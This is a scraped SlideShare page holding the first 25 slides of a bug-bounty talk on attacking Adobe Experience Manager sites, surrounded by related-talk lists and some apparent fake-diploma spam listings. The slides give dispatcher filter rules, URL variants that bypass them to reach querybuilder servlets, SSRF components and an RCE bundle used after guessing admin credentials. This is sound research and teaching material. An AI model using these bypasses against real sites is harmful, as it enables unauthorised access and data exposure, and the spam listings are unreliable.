Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
Security BSides Ahmedabad
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Soroush Dalili
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
Luke Weerasooriya
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해
beom kyun choi
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
Aaron Hnatiw
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 

What's hot (20)

Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
How to steal and modify data using Business Logic flaws - Insecure Direct Obj...
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applications
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
Cross Origin Resource Sharing
Cross Origin Resource SharingCross Origin Resource Sharing
Cross Origin Resource Sharing
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해스프링 시큐리티 구조 이해
스프링 시큐리티 구조 이해
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 

Similar to AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

Operating Docker
Operating DockerOperating Docker
Operating Docker
Jen Andre
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shells
Anthony D Hendricks
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking it
Tim Plummer
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
Francis Alexander
 
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.PyCon AU 2010 - Getting Started With Apache/mod_wsgi.
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.Graham Dumpleton
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
Edouard de Lansalut
 
Flashack
FlashackFlashack
Flashack
n|u - The Open Security Community
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
SiteGround.com
 
Automatisation in development and testing - within budget
Automatisation in development and testing - within budgetAutomatisation in development and testing - within budget
Automatisation in development and testing - within budget
David Lukac
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
ColdFusionConference
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
Darren Duke
 
PHP Security
PHP SecurityPHP Security
PHP Security
Mindfire Solutions
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Chetan Soni
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
zakieh alizadeh
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practicesAmit Kejriwal
 

Similar to AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs (20)

Operating Docker
Operating DockerOperating Docker
Operating Docker
 
Splunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shellsSplunk: Forward me the REST of those shells
Splunk: Forward me the REST of those shells
 
Making Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking itMaking Joomla Insecure - Explaining security by breaking it
Making Joomla Insecure - Explaining security by breaking it
 
Rails Security
Rails SecurityRails Security
Rails Security
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.PyCon AU 2010 - Getting Started With Apache/mod_wsgi.
PyCon AU 2010 - Getting Started With Apache/mod_wsgi.
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
Flashack
FlashackFlashack
Flashack
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
 
8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them8 Most Popular Joomla Hacks & How To Avoid Them
8 Most Popular Joomla Hacks & How To Avoid Them
 
Automatisation in development and testing - within budget
Automatisation in development and testing - within budgetAutomatisation in development and testing - within budget
Automatisation in development and testing - within budget
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) HackableCollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
CollabSphere SC 103 : Domino on the Web : Yes, It's (Probably) Hackable
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security ExpertComplete Wordpress Security By CHETAN SONI - Cyber Security Expert
Complete Wordpress Security By CHETAN SONI - Cyber Security Expert
 
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesKrzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comes
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
LAMP security practices
LAMP security practicesLAMP security practices
LAMP security practices
 

Recently uploaded

7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
Danica Gill
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Brad Spiegel Macon GA
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
JeyaPerumal1
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
cuobya
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
nhiyenphan2005
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
eutxy
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
3ipehhoa
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
cuobya
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
3ipehhoa
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
Trish Parr
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
3ipehhoa
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
SEO Article Boost
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
JeyaPerumal1
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
vmemo1
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
Arif0071
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
keoku
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
GTProductions1
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
zoowe
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Florence Consulting
 

Recently uploaded (20)

7 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 20247 Best Cloud Hosting Services to Try Out in 2024
7 Best Cloud Hosting Services to Try Out in 2024
 
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptx
 
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
2.Cellular Networks_The final stage of connectivity is achieved by segmenting...
 
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
可查真实(Monash毕业证)西澳大学毕业证成绩单退学买
 
Bài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docxBài tập unit 1 English in the world.docx
Bài tập unit 1 English in the world.docx
 
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
一比一原版(LBS毕业证)伦敦商学院毕业证成绩单专业办理
 
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
1比1复刻(bath毕业证书)英国巴斯大学毕业证学位证原版一模一样
 
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
假文凭国外(Adelaide毕业证)澳大利亚国立大学毕业证成绩单办理
 
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
急速办(bedfordhire毕业证书)英国贝德福特大学毕业证成绩单原版一模一样
 
Search Result Showing My Post is Now Buried
Search Result Showing My Post is Now BuriedSearch Result Showing My Post is Now Buried
Search Result Showing My Post is Now Buried
 
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
原版仿制(uob毕业证书)英国伯明翰大学毕业证本科学历证书原版一模一样
 
Understanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdfUnderstanding User Behavior with Google Analytics.pdf
Understanding User Behavior with Google Analytics.pdf
 
1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...1.Wireless Communication System_Wireless communication is a broad term that i...
1.Wireless Communication System_Wireless communication is a broad term that i...
 
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024
 
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
重新申请毕业证书(RMIT毕业证)皇家墨尔本理工大学毕业证成绩单精仿办理
 
test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...test test test test testtest test testtest test testtest test testtest test ...
test test test test testtest test testtest test testtest test testtest test ...
 
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
一比一原版(SLU毕业证)圣路易斯大学毕业证成绩单专业办理
 
Comptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guideComptia N+ Standard Networking lesson guide
Comptia N+ Standard Networking lesson guide
 
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
国外证书(Lincoln毕业证)新西兰林肯大学毕业证成绩单不能毕业办理
 
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdfMeet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
Meet up Milano 14 _ Axpo Italia_ Migration from Mule3 (On-prem) to.pdf
 

AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs

  • 1. AEM hacker approaching Adobe Experience Manager webapps in bug bounty programs Mikhail Egorov @0ang3el
  • 2. Mikhail Egorov • Whitehat, security researcher, bug hunter, conference speaker • Bugcrowd – https://www.bugcrowd.com/0ang3el • H1 – https://www.hackerone.com/0ang3el • Twitter - @0ang3el • GitHub - https://github.com/0ang3el • Slideshare - https://www.slideshare.net/0ang3el • Speakerdeck - https://speakerdeck.com/0ang3el • LinkedIn - https://www.linkedin.com/in/0ang3el 2/124
  • 3. Why this talk? • A lot of AEM targets are in scope of BBP or VPD • AEM webapps are usually insecure • Security misconfigurations (AEM is complex) • Not installed security updates • Attract attention to AEM webapps insecurity • Motivate bug hunters to test AEM webapps 3/124
  • 4. Topics to discuss • Methodology w/ bug examples • Automation • AEM Hacker Toolset – https://github.com/0ang3el/aem-hacker.git • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Only known vulnerabilities and techniques are discussed!!! 4/124
  • 5. Public BBP with AEM targets in scope 5/124
  • 6. Public VPD with AEM targets in scope 6/124
  • 7. Personal achievements in 2018 • Reported 84 non-duplicate bugs on Bugcrowd and H1 for AEM targets • P1s – 38 issues • P2s – 37 issues • P3s – 7 issues • P4s – 2 issue • Got 2 CVEs from Adobe PSIRT 7/124
  • 8. Personal achievements in 2018 • P1s • RCE • Secrets disclosure (passwords, tokens) • P2s • Internal SSRF, High impact • Stored XSS • Application-level DoS, Easy Difficulty • P3s • Internal SSRF, Medium impact • Reflected XSS • Application-level DoS, Medium Difficulty • P4s • Reflected XSS, Flash-based 8/124
  • 9. Previous works 2015 - https://www.slideshare.net/0ang3el/hacking-aem-sites 2016 - http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com- Remote-Code-Execution-Write-Up.html 2018 - https://speakerdeck.com/fransrosen/a-story-of-the-passive- aggressive-sysadmin-of-aem 2018 - https://medium.com/@jonathanbouman/reflected-xss-at-philips-com- e48bf8f9cd3c 2018 - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem- webapps 9/124
  • 11. AEM architecture • Based on open source projects • Apache Felix • Apache Sling • Apache OAK JCR https://helpx.adobe.com/experience-manager/using/osgi_getting_started.html 11/124
  • 12. Common AEM deployment Main blocks: • Author AEM instance • Publish AEM instance • AEM dispatcher (~WAF) Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? 12/124
  • 13. AEM dispatcher • In theory … a front end system offers an extra layer of security to your Adobe Experience Manager infrastructure • Often in practice … it’s the only security layer!!! • Admins rarely keep all components on Publish instance updated and securely configured! • Dispatcher bypasses allow to talk to those “insecure” components on Publish instance 13/124
  • 14. AEM Dispatcher bypasses • CVE-2016-0957 • Bypasses for “interesting” servlets • Add multiple slashes • SSRF • Other 14/124
  • 15. Using CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only /0041 { /type "allow" /url "*.css" } # enable css /0042 { /type "allow" /url "*.gif" } # enable gifs /0043 { /type "allow" /url "*.ico" } # enable icos /0044 { /type "allow" /url "*.js" } # enable javascript /0045 { /type "allow" /url "*.png" } # enable png /0046 { /type "allow" /url "*.swf" } # enable flash /0047 { /type "allow" /url "*.jpg" } # enable jpg /0048 { /type "allow" /url "*.jpeg" } # enable jpeg /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization Policy dispatcher.any before CVE-2016-0957 15/124
  • 16. Using CVE-2016-0957 # Deny content grabbing /0081 { /type "deny" /url "*.infinity.json" } /0082 { /type "deny" /url "*.tidy.json" } /0083 { /type "deny" /url "*.sysview.xml" } /0084 { /type "deny" /url "*.docview.json" } /0085 { /type "deny" /url "*.docview.xml" } /0086 { /type "deny" /url "*.*[0-9].json" } # Deny query (and additional selectors) /0090 { /type "deny" /url "*.query*.json" } } Policy dispatcher.any before CVE-2016-0957 16/124
  • 18. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 /filter { # Deny everything first and then allow specific entries /0001 { /type "deny" /glob "*" } # Allow non-public content directories /0023 { /type "allow" /url "/content*" } # disable this rule to allow mapped content only # Enable extensions in non-public content directories, using a regular expression /0041 { /type "allow" /extension '(clientlibs|css|gif|ico|js|png|swf|jpe?g|woff2?)’ } 18/124
  • 19. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Enable features /0062 { /type "allow" /url "/libs/cq/personalization/*" } # enable personalization # Deny content grabbing, on all accessible pages, using regular expressions /0081 { /type "deny" /selectors '((sys|doc)view|query|[0-9-]+)’ /extension '(json|xml)’ } 19/124
  • 20. Bypasses for “interesting” servlets Policy dispatcher.any after CVE-2016-0957 # Deny content grabbing for /content /0082 { /type "deny" /path "/content" /selectors '(feed|rss|pages|languages|blueprint|infinity|tidy)’ /extension '(json|xml|html)’ } } 20/124
  • 21. Bypasses for “interesting” servlets https://aemsite/bin/querybuilder.json https://aemsite/bin/querybuilder.json/a.css https://aemsite/bin/querybuilder.json;%0aa.css https://aemsite/bin/querybuilder.json.servlet.css https://aemsite/bin/querybuilder.json.servlet.html https://aemsite/bin/querybuilder.json.servlet.ico https://aemsite/bin/querybuilder.json.servlet.png Blocked Allowed 21/124
  • 22. Add multiple slashes • ///etc.json instead of /etc.json • ///bin///querybuilder.json instead of /bin/querybuilder.json 22/124
  • 23. Using SSRF • We need SSRF in a component that is allowed by AEM dispatcher policy • SSRF should allow to send GET request and see response • Opensocial (Shindig) proxy • SSRF in ReportingServicesProxyServlet (CVE-2018-12809) 23/124
  • 25. AEM RCE bundle • AEM RCE bundle – https://github.com/0ang3el/aem-rce-bundle.git • Has pre-build OSGI bundle for AEM 6.2 or newer • Allows to get RCE when you have access to Felix Console • Happens when you guessed admin credentials 25/124
